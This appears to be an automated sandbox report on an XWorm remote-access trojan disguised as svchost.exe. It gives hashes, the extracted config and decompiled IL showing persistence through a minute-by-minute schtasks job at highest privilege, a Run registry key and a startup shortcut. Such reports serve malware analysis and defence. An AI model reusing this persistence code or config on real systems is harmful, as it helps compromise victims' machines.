Malicious
Malicious

372ac16c1b093925f1fd5dcf0cd8e65a

PE Executable
|
MD5: 372ac16c1b093925f1fd5dcf0cd8e65a
|
Size: 106.51 KB
|
application/x-dosexec

Print
Infection Chain
Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Very high

Hash
 Hash Value
MD5
372ac16c1b093925f1fd5dcf0cd8e65a
Sha1
cdf1918504624f5ec45afa1b89a767ce69d59179
Sha256
9e9cdb73b86ee414514e568f6c9ac6df6749763fb7982d7a046d9e78d5bdbc13
Sha384
a8dc0dfc7daec542dc0dfae2d1d92fb8627f2d7762c7ed58f683509bfb9fbf71852183d58ac69441d4cf3292d5b45592
Sha512
ff9c6b96abf695ac67b8ffa3f039081e558e5ad20148fdaa51994dab903ca5a06db67da49d5c5f1388c85da27f5316aa6f0aac1b9104629838958ec165e1e2e9
SSDeep
1536:DFUyWFNKMJcdviTtVnQcBYsbREkPvYrc6uuDOHpz98a1:DFUJLJcdEp/bRE0vYfOHpzD
TLSH
96A38E1C77E50415E5FFAFB019F07292CA79F7671903D66F148A02CA1A23A84CE517F6

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
372ac16c1b093925f1fd5dcf0cd8e65a
Malicious
[Rebuild from dump]_7d509923.exe
Malicious
Malware Configuration - XWorm config.
Config. Field
 Value
Mutex

WOQXTs7oWtD8M8qYrlLmR7eEI46g3f+d+hCtgdBqDUXJOzba2H9wuYjhwBC+sbWO
KEY

WOQXTs7oWtD8M8qYrlLmR7eEI46g3f+d+hCtgdBqDUXJOzba2H9wuYjhwBC+sbWO
USBNM

4a8UMKIfyQAciVpJ/gXv5Q==
family

xworm
Informations
Name
 Value
Info

PE Detect: PeReader FAIL, AsmResolver Mapped OK
Info

Remap: Mapped -> FileLayout (RAM only) as [Rebuild from dump]_7d509923.exe
Module Name

svchost.exe
Full Name

svchost.exe
EntryPoint

System.Void Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::5WrlDg5i655VIwfunw31kaXdH1uqLJr7SYyArUPCesn6aR8kGQX0eSekWl1KY4WSMqM7iD()
Scope Name

svchost.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

svchost
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

459
Main Method

System.Void Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::5WrlDg5i655VIwfunw31kaXdH1uqLJr7SYyArUPCesn6aR8kGQX0eSekWl1KY4WSMqM7iD()
Main IL Instruction Count

370
Main IL

ldsfld System.Int32 BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::jA8enWwJZ0U72zssK0t9P8acH22TIYkcGS7gxxcH99ibxgs6A69l0XubtYzUpW0Z0JYRcM ldc.i4 1000 mul.ovf <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::s2euPEzvKdAIzisG7FIaqMqXmUCQjmXfHjAJCfbWypctU3KItgS8z0g6mJ3hCDuJQ8RgU1 call System.Object Stub.V75egDbDQWLf1Ls::ZNqxwv2AaIaLZyJ(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::s2euPEzvKdAIzisG7FIaqMqXmUCQjmXfHjAJCfbWypctU3KItgS8z0g6mJ3hCDuJQ8RgU1 ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::hupExg0CtLbw7dE12iK8OxJeBbzPEvMB13gEPcNnCskz4dvyWEB7TCJnY4nF9feeo6cuWg call System.Object Stub.V75egDbDQWLf1Ls::ZNqxwv2AaIaLZyJ(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::hupExg0CtLbw7dE12iK8OxJeBbzPEvMB13gEPcNnCskz4dvyWEB7TCJnY4nF9feeo6cuWg ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::XThfXYqC8MGK4M9IoDqf4Cq0Tls73BMenIUvCCusaT6LiUJ4Xq0xiRorzq8ybSrFIomofK call System.Object Stub.V75egDbDQWLf1Ls::ZNqxwv2AaIaLZyJ(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::XThfXYqC8MGK4M9IoDqf4Cq0Tls73BMenIUvCCusaT6LiUJ4Xq0xiRorzq8ybSrFIomofK ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::v77NisA3VClRNh2cjFOBmtOc55UsDCGqteVVMhmK7SLOA4WbgWCAGnBlz1eS44i1SVlOuD call System.Object Stub.V75egDbDQWLf1Ls::ZNqxwv2AaIaLZyJ(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::v77NisA3VClRNh2cjFOBmtOc55UsDCGqteVVMhmK7SLOA4WbgWCAGnBlz1eS44i1SVlOuD ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::MKtwhyi9sz8wkOxnU3KFMr9XwYUwOB40bDSmVSfEo2JMzG9r4mtDpKJiRiXxHVdyGFwUkt call System.Object Stub.V75egDbDQWLf1Ls::ZNqxwv2AaIaLZyJ(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::MKtwhyi9sz8wkOxnU3KFMr9XwYUwOB40bDSmVSfEo2JMzG9r4mtDpKJiRiXxHVdyGFwUkt ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::uJQirOXk1aauEis5IiFQ9sCmlbxQ4l3Dhk56V7jTJynsTa5cnjY5XiLwEb71AfUnPUPiVF call System.Object Stub.V75egDbDQWLf1Ls::ZNqxwv2AaIaLZyJ(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.String System.Environment::ExpandEnvironmentVariables(System.String) stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::uJQirOXk1aauEis5IiFQ9sCmlbxQ4l3Dhk56V7jTJynsTa5cnjY5XiLwEb71AfUnPUPiVF ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::EPIQanbnO8MBf6eVOPK0N8athPvyapfzJNY36SI3FqqqJiayc9qxYxzEfTwjyDWKwjyIGC call System.Object Stub.V75egDbDQWLf1Ls::ZNqxwv2AaIaLZyJ(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::EPIQanbnO8MBf6eVOPK0N8athPvyapfzJNY36SI3FqqqJiayc9qxYxzEfTwjyDWKwjyIGC ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::Naxy2Pj0lqzrrtpWpa68gZuS6xXeISE6bH8L3LY3sIIixnhrhJ3cscnY6Kh5Ub7INBHBDX call System.Object Stub.V75egDbDQWLf1Ls::ZNqxwv2AaIaLZyJ(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::Naxy2Pj0lqzrrtpWpa68gZuS6xXeISE6bH8L3LY3sIIixnhrhJ3cscnY6Kh5Ub7INBHBDX ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::OscshneFCKzTfjbfEZDNP4PTYMNRSRs6bkV4LLdfk9NFNzQG3W2AkchjMi57JKy9m76SAd call System.Object Stub.V75egDbDQWLf1Ls::ZNqxwv2AaIaLZyJ(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::OscshneFCKzTfjbfEZDNP4PTYMNRSRs6bkV4LLdfk9NFNzQG3W2AkchjMi57JKy9m76SAd ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::ZOZyJtSiWtIiUiu7CJRvfgTuix2M4YqBiiVnUVfCJhdJLjfdeVPb3hXKvB103riiUTd5AD call System.Object Stub.V75egDbDQWLf1Ls::ZNqxwv2AaIaLZyJ(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::ZOZyJtSiWtIiUiu7CJRvfgTuix2M4YqBiiVnUVfCJhdJLjfdeVPb3hXKvB103riiUTd5AD ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::9O2p0xkbCxBtveASrsNnIFaPUFHcoZMLPhClyYw0ojAqkiU0RUvMjKVZAA1fPXnTgk1Gst call System.Object Stub.V75egDbDQWLf1Ls::ZNqxwv2AaIaLZyJ(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::9O2p0xkbCxBtveASrsNnIFaPUFHcoZMLPhClyYw0ojAqkiU0RUvMjKVZAA1fPXnTgk1Gst ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::zmcocqrKiU72pItN5Su2IGg0DXVRjem0CyWF2MQ8pCw6F3YrH5DA19duvf7ZXQ0ldplC7g call System.Object Stub.V75egDbDQWLf1Ls::ZNqxwv2AaIaLZyJ(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::zmcocqrKiU72pItN5Su2IGg0DXVRjem0CyWF2MQ8pCw6F3YrH5DA19duvf7ZXQ0ldplC7g leave.s IL_011C: call System.Boolean Stub.xObx1d3oIBS3ePn::C3BNVPjEadnCAm8() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_4 ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_011C: call System.Boolean Stub.xObx1d3oIBS3ePn::C3BNVPjEadnCAm8() call System.Boolean Stub.xObx1d3oIBS3ePn::C3BNVPjEadnCAm8() brtrue.s IL_0129: call System.Void Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::9DcX9g9NNktnAldBuVHwVgxp963GvFJETvRdOpnhlS6Ardbe38dIDm15gee0s5shi673VN() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::9DcX9g9NNktnAldBuVHwVgxp963GvFJETvRdOpnhlS6Ardbe38dIDm15gee0s5shi673VN() leave.s IL_013F: call System.Void Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::qQDtU6iUdviFKPfB44pxzgIUT8WorhaGoIfTKEeaqJe8EAokNLTYJ2LiF4a3UU44va7S5J() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_5 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_013F: call System.Void Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::qQDtU6iUdviFKPfB44pxzgIUT8WorhaGoIfTKEeaqJe8EAokNLTYJ2LiF4a3UU44va7S5J() call System.Void Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::qQDtU6iUdviFKPfB44pxzgIUT8WorhaGoIfTKEeaqJe8EAokNLTYJ2LiF4a3UU44va7S5J() ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::uJQirOXk1aauEis5IiFQ9sCmlbxQ4l3Dhk56V7jTJynsTa5cnjY5XiLwEb71AfUnPUPiVF ldstr \ ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::EPIQanbnO8MBf6eVOPK0N8athPvyapfzJNY36SI3FqqqJiayc9qxYxzEfTwjyDWKwjyIGC call System.String System.String::Concat(System.String,System.String,System.String) stloc.1 <null> ldloc.1 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.DirectoryInfo::get_FullName() stloc.s V_6 ldloc.s V_6 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_0186: ldloc.1 ldloc.s V_6 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.1 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_019D: ldc.i4 1000 ldloc.1 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_7 ldloc.s V_7 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.1 <null> ldsfld System.String Stub.xObx1d3oIBS3ePn::qxajNHJ6rhWRrRF call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_01C8: ldstr "schtasks.exe" dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_8 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01C8: ldstr "schtasks.exe" ldstr schtasks.exe newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String) stloc.s V_10 ldloc.s V_10 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) call System.String Stub.EqLrnQX2mVX6raqKdT7LRHnHz5aKS67RAADklnVdu65gZ8jh1k60wvj::YxuRWYQ1IuD9orzb53a6VkP0SgHIjZwcrR3lk3iQDrpm48AJ5y1oDxD() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_022E: ldloc.s V_10 ldloc.s V_10 ldc.i4.5 <null> newarr System.String stloc.s V_15 ldloc.s V_15 ldc.i4.0 <null> ldstr /create /f /RL HIGHEST /sc minute /mo 1 /tn " stelem.ref <null> ldloc.s V_15 ldc.i4.1 <null> ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::EPIQanbnO8MBf6eVOPK0N8athPvyapfzJNY36SI3FqqqJiayc9qxYxzEfTwjyDWKwjyIGC call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stelem.ref <null> ldloc.s V_15 ldc.i4.2 <null> ldstr " /tr " stelem.ref <null> ldloc.s V_15 ldc.i4.3 <null> ldloc.1 <null> stelem.ref <null> ldloc.s V_15 ldc.i4.4 <null> ldstr " stelem.ref <null> ldloc.s V_15 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) br.s IL_0272: ldloc.s V_10 ldloc.s V_10 ldc.i4.5 <null> newarr System.String stloc.s V_15 ldloc.s V_15 ldc.i4.0 <null> ldstr /create /f /sc minute /mo 1 /tn " stelem.ref <null> ldloc.s V_15 ldc.i4.1 <null> ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::EPIQanbnO8MBf6eVOPK0N8athPvyapfzJNY36SI3FqqqJiayc9qxYxzEfTwjyDWKwjyIGC call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stelem.ref <null> ldloc.s V_15 ldc.i4.2 <null> ldstr " /tr " stelem.ref <null> ldloc.s V_15 ldc.i4.3 <null> ldloc.1 <null> stelem.ref <null> ldloc.s V_15 ldc.i4.4 <null> ldstr " stelem.ref <null> ldloc.s V_15 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_10 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_9 ldloc.s V_9 callvirt System.Void System.Diagnostics.Process::WaitForExit() leave.s IL_0293: call My.I1WyLc3iq4kFXYQMYdySAuov8r7uF6VgJwH4RBcGnXCZ1su0W6KPesYqv584ez1JRGKv8j My.c1E8mGOGtvdg5dvPZx2f7bRSuUpsHNmHSCYhFFLULtbXhUBqEqhNh7FvLpL7nl2WdCpMpW::lJk6CQ2gP01mNygdpWtjy7SahYmBoelvgShHrkQ14mh9XqH7noqfXTC7xvaxadUzSIQtWt() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_11 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0293: call My.I1WyLc3iq4kFXYQMYdySAuov8r7uF6VgJwH4RBcGnXCZ1su0W6KPesYqv584ez1JRGKv8j My.c1E8mGOGtvdg5dvPZx2f7bRSuUpsHNmHSCYhFFLULtbXhUBqEqhNh7FvLpL7nl2WdCpMpW::lJk6CQ2gP01mNygdpWtjy7SahYmBoelvgShHrkQ14mh9XqH7noqfXTC7xvaxadUzSIQtWt() call My.I1WyLc3iq4kFXYQMYdySAuov8r7uF6VgJwH4RBcGnXCZ1su0W6KPesYqv584ez1JRGKv8j My.c1E8mGOGtvdg5dvPZx2f7bRSuUpsHNmHSCYhFFLULtbXhUBqEqhNh7FvLpL7nl2WdCpMpW::lJk6CQ2gP01mNygdpWtjy7SahYmBoelvgShHrkQ14mh9XqH7noqfXTC7xvaxadUzSIQtWt() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::EPIQanbnO8MBf6eVOPK0N8athPvyapfzJNY36SI3FqqqJiayc9qxYxzEfTwjyDWKwjyIGC call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.1 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) leave.s IL_02CE: ldc.i4.7 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_12 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_02CE: ldc.i4.7 ldc.i4.7 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \ ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::EPIQanbnO8MBf6eVOPK0N8athPvyapfzJNY36SI3FqqqJiayc9qxYxzEfTwjyDWKwjyIGC call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldstr .lnk call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_13 ldstr WScript.Shell ldstr call System.Object Microsoft.VisualBasic.Interaction::CreateObject(System.String,System.String) ldnull <null> ldstr CreateShortcut ldc.i4.1 <null> newarr System.Object stloc.s V_16 ldloc.s V_16 ldc.i4.0 <null> ldloc.s V_13 stelem.ref <null> ldloc.s V_16 stloc.s V_17 ldloc.s V_17 ldnull <null> ldnull <null> ldc.i4.1 <null> newarr System.Boolean stloc.s V_18 ldloc.s V_18 ldc.i4.0 <null> ldc.i4.1 <null> stelem.i1 <null> ldloc.s V_18 call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) ldloc.s V_18 ldc.i4.0 <null> ldelem.i1 <null> brfalse.s IL_0353: stloc.s V_19 ldloc.s V_17 ldc.i4.0 <null> ldelem.ref <null> call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) ldtoken System.String call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Object Microsoft.VisualBasic.CompilerServices.Conversions::ChangeType(System.Object,System.Type) castclass System.String stloc.s V_13 stloc.s V_19 ldloc.s V_19 ldnull <null> ldstr TargetPath ldc.i4.1 <null> newarr System.Object stloc.s V_20 ldloc.s V_20 ldc.i4.0 <null> ldloc.1 <null> stelem.ref <null> ldloc.s V_20 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_19 ldnull <null> ldstr WorkingDirectory ldc.i4.1 <null> newarr System.Object stloc.s V_20 ldloc.s V_20 ldc.i4.0 <null> ldstr stelem.ref <null> ldloc.s V_20 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_19 ldnull <null> ldstr Save ldc.i4.0 <null> newarr System.Object ldnull <null> ldnull <null> ldnull <null> ldc.i4.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) pop <null> ldnull <null> stloc.s V_19 ldloc.s V_13 ldc.i4.3 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode) stsfld System.IO.FileStream Stub.xObx1d3oIBS3ePn::aoUiRAE5hnul3VV leave.s IL_03D2: call System.Void Stub.lmAt6LnWM5Mi2AOWBuqLk7FJXCTeZ79JAW0PDCw0okgKVMCrweCDHnSEJq3Sg22MUnqgEZqRK::4hbDxL1pJ9C3N5TgHhYS9DH8EuB9yUU97xBcnAbQth1BgwHOwBpbhQMhz9YUjjOyN06Obxp2q() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_14 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_03D2: call System.Void Stub.lmAt6LnWM5Mi2AOWBuqLk7FJXCTeZ79JAW0PDCw0okgKVMCrweCDHnSEJq3Sg22MUnqgEZqRK::4hbDxL1pJ9C3N5TgHhYS9DH8EuB9yUU97xBcnAbQth1BgwHOwBpbhQMhz9YUjjOyN06Obxp2q() call System.Void Stub.lmAt6LnWM5Mi2AOWBuqLk7FJXCTeZ79JAW0PDCw0okgKVMCrweCDHnSEJq3Sg22MUnqgEZqRK::4hbDxL1pJ9C3N5TgHhYS9DH8EuB9yUU97xBcnAbQth1BgwHOwBpbhQMhz9YUjjOyN06Obxp2q() ldsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::MKtwhyi9sz8wkOxnU3KFMr9XwYUwOB40bDSmVSfEo2JMzG9r4mtDpKJiRiXxHVdyGFwUkt call System.String Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::avUcMz6vNlkDxnZNp6DAZ9jawjRyYFSOqSTm961JWJZwjK1LkOaMuwRBmyy0h8imLjt3Do(System.String) stloc.0 <null> ldloc.0 <null> ldc.i4.1 <null> newarr System.Char stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> ldloc.s V_21 callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::OvyIcWcizqs7mH6poPXCTmpNNdvXt8cqChm4gkvbiLFrI1l1Q6NoR98OvmrJmNbvClOIx2 ldloc.0 <null> ldc.i4.1 <null> newarr System.Char stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> ldloc.s V_21 callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.1 <null> ldelem.ref <null> stsfld System.String BsZtbyBQgzeLwKlNHPMERHo0UPOp8dHngXlgHM7RsBIj1TrCg3V9N6wCJHLDghhkrl4zMN::n3jqdXsoxmmXGcxa5X3c161uQDV0Vsvek5GwCqL9Qjo7aQDAk7v9e0oY26ezs2gNoTFfHD call System.Void Stub.xObx1d3oIBS3ePn::rYjhvPjqExZG0A6() ldnull <null> ldftn System.Void Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::lkfCKAW9TEjLg7slqealCUVaRb8EmHPhVG3Nl83gSM3N3dG8gQ4AUPS() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() ldnull <null> ldftn System.Void Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::msRFt4R5ibSPcNItDNSXO8DHARafi5olxydlQzfhAk9eej1iwGCWRMr() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() call System.String Stub.EqLrnQX2mVX6raqKdT7LRHnHz5aKS67RAADklnVdu65gZ8jh1k60wvj::YxuRWYQ1IuD9orzb53a6VkP0SgHIjZwcrR3lk3iQDrpm48AJ5y1oDxD() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_045E: call System.Void Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::Kq6tW72CRaCvtiiEkyzurky6E42mdbzvI1GB1RAB4qVowfibiaXF8vJxhx8498qJEej4kJ() call System.Void Stub.eCikzGaR97ecWdf::QP3FedPgKvhSIEo() call System.Void Stub.RtwNb2jMFU5znfM3N5xkBFnXFMLMlaMowliJs4NHwYV83U29wWDjZDal3CYAcoefOs8eHw::Kq6tW72CRaCvtiiEkyzurky6E42mdbzvI1GB1RAB4qVowfibiaXF8vJxhx8498qJEej4kJ() ldnull <null> ldftn System.Void 